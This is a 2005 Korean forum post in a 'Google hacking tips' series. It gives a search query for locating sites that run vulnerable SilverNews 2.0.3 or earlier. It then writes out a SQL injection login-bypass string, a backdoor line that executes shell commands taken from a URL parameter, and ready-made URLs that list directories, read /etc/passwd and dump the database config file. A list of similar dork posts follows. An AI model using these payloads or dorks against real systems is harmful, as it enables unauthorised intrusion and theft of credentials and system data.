☞ 예전 게시판은 여기를 클릭하세요 ☜

◎ No, 251 ◎ 작성인: lucifer ◎ 구분: vulnerability ◎ 위험도: 上 ◎ 2005/9/9(금) ◎ 조회: 1419 ◎ 평가:

[G050909-H]구글해킹팁 "Powered by SilverNews"  검색어 "Powered by SilverNews" 취약점 Silvernews 2.0.3이나 그 이하의 버전에서 sql 삽입공격/로그인우회/원격코드실행/크로스사이트스크립팅을 가능케한다. sql 삽입공격/로그인우회: user: ' or isnull(1/0) /* pass: whatever 원격명령어실행: //*********************************************** </body> </html> TEMPLATE; } } system($HTTP_GET_VARS[command]); /* 백도어 url: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la 파일보기 : http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd sql 비번보기 : http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php

이름   메일   관리자권한임   내용                                 12345678910-1-2-3-4-5-6-7-8-9-10   관리자권한임

구분	위험도	게시제목	작성인	작성일	조회
multi	上	[G050904-H]구글해킹팁 inurl:nquser.php filetype:php	lucifer	09-04	1509
multi	上	[G050905-H]구글해킹팁 PHPFreeNews inurl:Admin.php	lucifer	09-05	1575
vulnerability	上	[G050909-H]구글해킹팁 "Powered by SilverNews"	lucifer	09-09	1419
vulnerability	上	[G050910-H]구글해킹팁 "Powered by Gravity Board"	lucifer	09-10	1564
webserver	下	[G050912-L]구글해킹팁 intitle:"Welcome to the Advanced E...	lucifer	09-12	1406
vulnerability	中	[G050913-M]구글해킹팁 "2003 DUware All Rights Reserved"	lucifer	09-13	1399
login	中	[G050516-M]구글해킹팁 filetype:pl -intext:"/usr/bin/...	lucifer	09-16	1609
vulnerability	上	[G050918-H]구글해킹팁 "powered by ITWorking"	lucifer	09-18	1810